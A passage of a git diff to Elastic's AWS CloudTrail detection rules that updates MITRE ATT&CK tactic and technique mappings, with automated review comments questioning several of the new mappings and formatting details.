@@ -109,22 +109,34 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1567" name = "Exfiltration Over Web Service" reference = "https://attack.mitre.org/techniques/T1567/" + [[rule.threat.technique.subtechnique]] id = "T1567.002" name = "Exfiltration to Cloud Storage" reference = "https://attack.mitre.org/techniques/T1567/002/" - - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1530" +name = "Data from Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1530/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/exfiltration_sns_rare_protocol_subscription_by_user.toml b/rules/integrations/aws/exfiltration_sns_rare_protocol_subscription_by_user.toml index 465364b2801..e0dc490b37c 100644 --- a/rules/integrations/aws/exfiltration_sns_rare_protocol_subscription_by_user.toml +++ b/rules/integrations/aws/exfiltration_sns_rare_protocol_subscription_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/01" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -88,46 +88,65 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1567" name = "Exfiltration Over Web Service" reference = "https://attack.mitre.org/techniques/T1567/" - [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1530" name = "Data from Cloud Storage" reference = "https://attack.mitre.org/techniques/T1530/" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1496" name = "Resource Hijacking" reference = "https://attack.mitre.org/techniques/T1496/" + [[rule.threat.technique.subtechnique]] id = "T1496.004" name = "Cloud Service Hijacking" reference = "https://attack.mitre.org/techniques/T1496/004/" - - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1102" +name = "Web Service" +reference = "https://attack.mitre.org/techniques/T1102/" + +[[rule.threat.technique.subtechnique]] +id = "T1102.003" +name = "One-Way Communication" +reference = "https://attack.mitre.org/techniques/T1102/003/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_aws_eventbridge_rule_disabled_or_deleted.toml b/rules/integrations/aws/impact_aws_eventbridge_rule_disabled_or_deleted.toml index 4b6fbec2338..f432d063a59 100644 --- a/rules/integrations/aws/impact_aws_eventbridge_rule_disabled_or_deleted.toml +++ b/rules/integrations/aws/impact_aws_eventbridge_rule_disabled_or_deleted.toml 
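Review bot: The added Command and Control entry maps a rare SNS subscription protocol to T1102.003 One-Way Communication; that sub-technique describes an implant receiving instructions from a web service, whereas an SNS subscription pushes data out to an external endpoint, which the existing T1567 Exfiltration Over Web Service entry already covers. Adding TA0011 broadens the rule's tactic coverage without any query change visible in this hunk. If it is kept, the description should spell out the C2 scenario (for example a subscription used to relay tasking to an adversary-controlled endpoint) and the `tags` list outside this hunk needs a matching `"Tactic: Command and Control"` entry.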
@@ -2,7 +2,7 @@ creation_date = "2021/10/17" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Austin Songer", "Elastic"] @@ -121,17 +121,34 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1489" name = "Service Stop" reference = "https://attack.mitre.org/techniques/T1489/" - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_aws_s3_bucket_enumeration_or_brute_force.toml b/rules/integrations/aws/impact_aws_s3_bucket_enumeration_or_brute_force.toml index 013d9381c79..6ec5c340a09 100644 --- a/rules/integrations/aws/impact_aws_s3_bucket_enumeration_or_brute_force.toml +++ b/rules/integrations/aws/impact_aws_s3_bucket_enumeration_or_brute_force.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/01" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -111,18 +111,25 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1657" name = "Financial Theft" reference = "https://attack.mitre.org/techniques/T1657/" - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1580" +name = "Cloud Infrastructure Discovery" +reference = "https://attack.mitre.org/techniques/T1580/" + [[rule.threat.technique]] id = "T1619" name = "Cloud Storage Object Discovery" @@ -132,20 +139,19 @@ reference = "https://attack.mitre.org/techniques/T1619/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1530" name = "Data from Cloud Storage" reference = "https://attack.mitre.org/techniques/T1530/" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" - - [rule.threshold] field = ["tls.client.server_name", "source.address", "aws.cloudtrail.user_identity.type"] value = 1 diff --git a/rules/integrations/aws/impact_cloudtrail_logging_updated.toml b/rules/integrations/aws/impact_cloudtrail_logging_updated.toml index f19cadad27f..cbab012a4ea 100644 --- a/rules/integrations/aws/impact_cloudtrail_logging_updated.toml +++ b/rules/integrations/aws/impact_cloudtrail_logging_updated.toml @@ -2,7 +2,7 @@ creation_date = "2020/06/10" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -87,34 +87,52 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1565" name = "Data Manipulation" reference = "https://attack.mitre.org/techniques/T1565/" + [[rule.threat.technique.subtechnique]] id = "T1565.001" name = "Stored Data Manipulation" reference = "https://attack.mitre.org/techniques/T1565/001/" - - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1530" name = "Data from Cloud Storage" reference = "https://attack.mitre.org/techniques/T1530/" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + +[[rule.threat.technique.subtechnique]] +id = "T1562.008" +name = "Disable or Modify Cloud Logs" +reference = "https://attack.mitre.org/techniques/T1562/008/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_cloudwatch_log_group_deletion.toml b/rules/integrations/aws/impact_cloudwatch_log_group_deletion.toml index 1f6a8dd5d98..ed265299c71 100644 --- a/rules/integrations/aws/impact_cloudwatch_log_group_deletion.toml +++ b/rules/integrations/aws/impact_cloudwatch_log_group_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/18" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -151,34 +151,39 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1485" name = "Data Destruction" reference = "https://attack.mitre.org/techniques/T1485/" - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1562.008" +name = "Disable or Modify Cloud Logs" +reference = "https://attack.mitre.org/techniques/T1562/008/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_cloudwatch_log_stream_deletion.toml b/rules/integrations/aws/impact_cloudwatch_log_stream_deletion.toml index 6312cf48c76..4ee8165d8fe 100644 --- a/rules/integrations/aws/impact_cloudwatch_log_stream_deletion.toml +++ b/rules/integrations/aws/impact_cloudwatch_log_stream_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/20" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
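Review bot: T1562.008 (Disable or Modify Cloud Logs) is added as a second sub-technique beside the existing T1562.001 (Disable or Modify Tools) and the hunk keeps .001; for deletion of a CloudWatch log group the cloud-logs sub-technique is the precise one, so confirm that keeping .001 is intentional rather than a leftover. The identical pairing appears in the impact_cloudwatch_log_stream_deletion hunk on the next line. The new `[[rule.threat.technique.subtechnique]]` block is inserted exactly where a blank line was removed, so it may sit directly against `reference = "https://attack.mitre.org/techniques/T1562/001/"` and `[rule.threat.tactic]` without the blank-line separators the rest of this hunk adds — the collapsed view cannot settle this, so check the file.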
@@ -138,34 +138,39 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1485" name = "Data Destruction" reference = "https://attack.mitre.org/techniques/T1485/" - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1562.008" +name = "Disable or Modify Cloud Logs" +reference = "https://attack.mitre.org/techniques/T1562/008/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_ec2_disable_ebs_encryption.toml b/rules/integrations/aws/impact_ec2_disable_ebs_encryption.toml index 0aa53f8fd0e..0b73ed699c3 100644 --- a/rules/integrations/aws/impact_ec2_disable_ebs_encryption.toml +++ b/rules/integrations/aws/impact_ec2_disable_ebs_encryption.toml @@ -2,7 +2,7 @@ creation_date = "2020/06/05" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -125,22 +125,39 @@ event.dataset:aws.cloudtrail and event.provider:ec2.amazonaws.com and event.acti [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1565" name = "Data Manipulation" reference = "https://attack.mitre.org/techniques/T1565/" + [[rule.threat.technique.subtechnique]] id = "T1565.001" name = "Stored Data Manipulation" reference = "https://attack.mitre.org/techniques/T1565/001/" - - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1578" +name = "Modify Cloud Compute Infrastructure" +reference = "https://attack.mitre.org/techniques/T1578/" + +[[rule.threat.technique.subtechnique]] +id = "T1578.005" +name = "Modify Cloud Compute Configurations" +reference = "https://attack.mitre.org/techniques/T1578/005/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_ec2_ebs_snapshot_access_removed.toml b/rules/integrations/aws/impact_ec2_ebs_snapshot_access_removed.toml index 1221591ba53..c6951c7a183 100644 --- a/rules/integrations/aws/impact_ec2_ebs_snapshot_access_removed.toml +++ b/rules/integrations/aws/impact_ec2_ebs_snapshot_access_removed.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/02" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -116,6 +116,7 @@ info where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1485" name = "Data Destruction" 
@@ -126,12 +127,28 @@ id = "T1490" name = "Inhibit System Recovery" reference = "https://attack.mitre.org/techniques/T1490/" - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1578" +name = "Modify Cloud Compute Infrastructure" +reference = "https://attack.mitre.org/techniques/T1578/" + +[[rule.threat.technique.subtechnique]] +id = "T1578.005" +name = "Modify Cloud Compute Configurations" +reference = "https://attack.mitre.org/techniques/T1578/005/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_iam_deactivate_mfa_device.toml b/rules/integrations/aws/impact_iam_deactivate_mfa_device.toml index 2a685166ca7..b5533647e46 100644 --- a/rules/integrations/aws/impact_iam_deactivate_mfa_device.toml +++ b/rules/integrations/aws/impact_iam_deactivate_mfa_device.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/26" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Austin Songer"] 
@@ -116,34 +116,52 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1531" name = "Account Access Removal" reference = "https://attack.mitre.org/techniques/T1531/" - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" + [[rule.threat.technique.subtechnique]] id = "T1556.006" name = "Multi-Factor Authentication" reference = "https://attack.mitre.org/techniques/T1556/006/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.006" +name = "Multi-Factor Authentication" +reference = "https://attack.mitre.org/techniques/T1556/006/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_kms_cmk_disabled_or_scheduled_for_deletion.toml b/rules/integrations/aws/impact_kms_cmk_disabled_or_scheduled_for_deletion.toml index 245d0ffc077..84fdd4c093a 100644 --- a/rules/integrations/aws/impact_kms_cmk_disabled_or_scheduled_for_deletion.toml +++ b/rules/integrations/aws/impact_kms_cmk_disabled_or_scheduled_for_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2022/09/21" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Xavier Pich"] 
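Review bot: The new third entry lists T1556 / T1556.006 under Defense Evasion while the unchanged second entry already lists the same technique and sub-technique under Persistence, so one technique now appears twice in the rule with only the tactic differing. That is a valid ATT&CK tactic for T1556, but the same "every tactic the technique belongs to" pattern recurs in this chunk for T1078.004 (initial_access_iam_session_token_used_from_multiple_addresses, initial_access_kali_user_agent_detected_with_aws_cli, both ml_cloudtrail_rare_method rules, and lateral_movement_ec2_instance_console_login, which ends up with six tactics and T1550.001 under two of them) and for T1098.004 in lateral_movement_ec2_instance_connect_ssh_public_key_uploaded. Mapping every tactic a technique is listed under dilutes tactic-based triage and coverage reporting; consider keeping only the tactics the detected behaviour evidences, or recording the rationale in the rule `note` where the duplication is deliberate.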
@@ -145,17 +145,21 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1485" name = "Data Destruction" reference = "https://attack.mitre.org/techniques/T1485/" +[[rule.threat.technique.subtechnique]] +id = "T1485.001" +name = "Lifecycle-Triggered Deletion" +reference = "https://attack.mitre.org/techniques/T1485/001/" [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_rds_instance_cluster_deletion_protection_disabled.toml b/rules/integrations/aws/impact_rds_instance_cluster_deletion_protection_disabled.toml index d12ddb1dc74..faa111891fb 100644 --- a/rules/integrations/aws/impact_rds_instance_cluster_deletion_protection_disabled.toml +++ b/rules/integrations/aws/impact_rds_instance_cluster_deletion_protection_disabled.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/28" integration = ["aws"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
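Review bot: The added sub-technique T1485.001 (Lifecycle-Triggered Deletion) is attached to a rule about a KMS CMK being disabled or scheduled for deletion; as I read it, ATT&CK scopes that sub-technique to deletion driven by storage lifecycle or retention policies, so a scheduled key deletion may be better left at the parent T1485 unless the rationale is documented. If the mapping is kept, a sentence in the rule `note` explaining why a pending key deletion is treated as lifecycle-triggered would help the next reviewer. The inserted block also lands between `reference = "https://attack.mitre.org/techniques/T1485/"` and `[rule.threat.tactic]` with no `+` blank line of its own, unlike the blank added after `framework` in the same hunk; confirm the separation on disk.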
@@ -124,17 +124,34 @@ any where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1485" name = "Data Destruction" reference = "https://attack.mitre.org/techniques/T1485/" - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1578" +name = "Modify Cloud Compute Infrastructure" +reference = "https://attack.mitre.org/techniques/T1578/" + +[[rule.threat.technique.subtechnique]] +id = "T1578.005" +name = "Modify Cloud Compute Configurations" +reference = "https://attack.mitre.org/techniques/T1578/005/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_rds_snapshot_deleted.toml b/rules/integrations/aws/impact_rds_snapshot_deleted.toml index 7e6e4313c9b..ccee14c1e59 100644 --- a/rules/integrations/aws/impact_rds_snapshot_deleted.toml +++ b/rules/integrations/aws/impact_rds_snapshot_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/29" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -154,17 +154,21 @@ any where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1485" name = "Data Destruction" reference = "https://attack.mitre.org/techniques/T1485/" +[[rule.threat.technique]] +id = "T1490" +name = "Inhibit System Recovery" +reference = "https://attack.mitre.org/techniques/T1490/" [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - [rule.investigation_fields] field_names = [ "@timestamp", 
diff --git a/rules/integrations/aws/impact_s3_bucket_object_uploaded_with_ransom_keyword.toml b/rules/integrations/aws/impact_s3_bucket_object_uploaded_with_ransom_keyword.toml index 36ccc844da3..5cb0621244b 100644 --- a/rules/integrations/aws/impact_s3_bucket_object_uploaded_with_ransom_keyword.toml +++ b/rules/integrations/aws/impact_s3_bucket_object_uploaded_with_ransom_keyword.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/17" integration = ["aws"] maturity = "production" -updated_date = "2026/02/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -148,6 +148,7 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1485" name = "Data Destruction" @@ -156,10 +157,19 @@ reference = "https://attack.mitre.org/techniques/T1485/" [[rule.threat.technique]] id = "T1486" name = "Data Encrypted for Impact" -reference = "https://attack.mitre.org/techniques/T1486/" +reference = "https://attack.mitre.org/techniques/T1486/" + +[[rule.threat.technique]] +id = "T1565" +name = "Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/" + +[[rule.threat.technique.subtechnique]] +id = "T1565.001" +name = "Stored Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/001/" [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - diff --git a/rules/integrations/aws/impact_s3_static_site_js_file_uploaded.toml b/rules/integrations/aws/impact_s3_static_site_js_file_uploaded.toml index 743ff129052..9a4bfdd2df7 100644 --- a/rules/integrations/aws/impact_s3_static_site_js_file_uploaded.toml +++ b/rules/integrations/aws/impact_s3_static_site_js_file_uploaded.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/15" integration = ["aws"] maturity = "production" -updated_date = "2025/12/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
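Review bot: In the `@@ -156,10 +157,19 @@` hunk the removed and added `reference = "https://attack.mitre.org/techniques/T1486/"` lines read identically, which usually means a trailing-whitespace or line-ending change; confirm that nothing invisible (a CR or a non-ASCII character) was introduced rather than removed, since the value is a URL that tooling may compare verbatim. The rest of the hunk adds T1565 / T1565.001 under the existing Impact tactic, which fits a ransom-note upload and needs no further change.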
@@ -122,10 +122,22 @@ from logs-aws.cloudtrail* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1491" +name = "Defacement" +reference = "https://attack.mitre.org/techniques/T1491/" + +[[rule.threat.technique.subtechnique]] +id = "T1491.002" +name = "External Defacement" +reference = "https://attack.mitre.org/techniques/T1491/002/" + [[rule.threat.technique]] id = "T1565" name = "Data Manipulation" reference = "https://attack.mitre.org/techniques/T1565/" + [[rule.threat.technique.subtechnique]] id = "T1565.001" name = "Stored Data Manipulation" @@ -135,7 +147,6 @@ reference = "https://attack.mitre.org/techniques/T1565/001/" id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/impact_s3_unusual_object_encryption_with_sse_c.toml b/rules/integrations/aws/impact_s3_unusual_object_encryption_with_sse_c.toml index aacd3792c06..3553a07eb9e 100644 --- a/rules/integrations/aws/impact_s3_unusual_object_encryption_with_sse_c.toml +++ b/rules/integrations/aws/impact_s3_unusual_object_encryption_with_sse_c.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/15" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -105,17 +105,34 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1486" name = "Data Encrypted for Impact" reference = "https://attack.mitre.org/techniques/T1486/" - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/initial_access_console_login_root.toml b/rules/integrations/aws/initial_access_console_login_root.toml index a8842b9754b..8ac3d7d8659 100644 --- a/rules/integrations/aws/initial_access_console_login_root.toml +++ b/rules/integrations/aws/initial_access_console_login_root.toml @@ -2,7 +2,7 @@ creation_date = "2020/06/11" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -133,10 +133,12 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" 
@@ -146,19 +148,3 @@ reference = "https://attack.mitre.org/techniques/T1078/004/" id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/integrations/aws/initial_access_iam_session_token_used_from_multiple_addresses.toml b/rules/integrations/aws/initial_access_iam_session_token_used_from_multiple_addresses.toml index 18c4c507427..0fe9671e72d 100644 --- a/rules/integrations/aws/initial_access_iam_session_token_used_from_multiple_addresses.toml +++ b/rules/integrations/aws/initial_access_iam_session_token_used_from_multiple_addresses.toml @@ -4,7 +4,7 @@ integration = ["aws"] maturity = "production" min_stack_version = "9.2.0" min_stack_comments = "aws.cloudtrail.session_credential_from_console field introduced in AWS integration version 4.6.0" -updated_date = "2026/02/25" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -222,19 +222,36 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/aws/initial_access_kali_user_agent_detected_with_aws_cli.toml b/rules/integrations/aws/initial_access_kali_user_agent_detected_with_aws_cli.toml index 93696cfc640..5b330a552b7 100644 --- a/rules/integrations/aws/initial_access_kali_user_agent_detected_with_aws_cli.toml +++ b/rules/integrations/aws/initial_access_kali_user_agent_detected_with_aws_cli.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/11" integration = ["aws"] maturity = "production" -updated_date = "2025/12/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -110,22 +110,39 @@ any where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/initial_access_password_recovery.toml b/rules/integrations/aws/initial_access_password_recovery.toml index 32b17765f99..f5071de40fb 100644 --- a/rules/integrations/aws/initial_access_password_recovery.toml +++ b/rules/integrations/aws/initial_access_password_recovery.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/02" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -125,14 +125,18 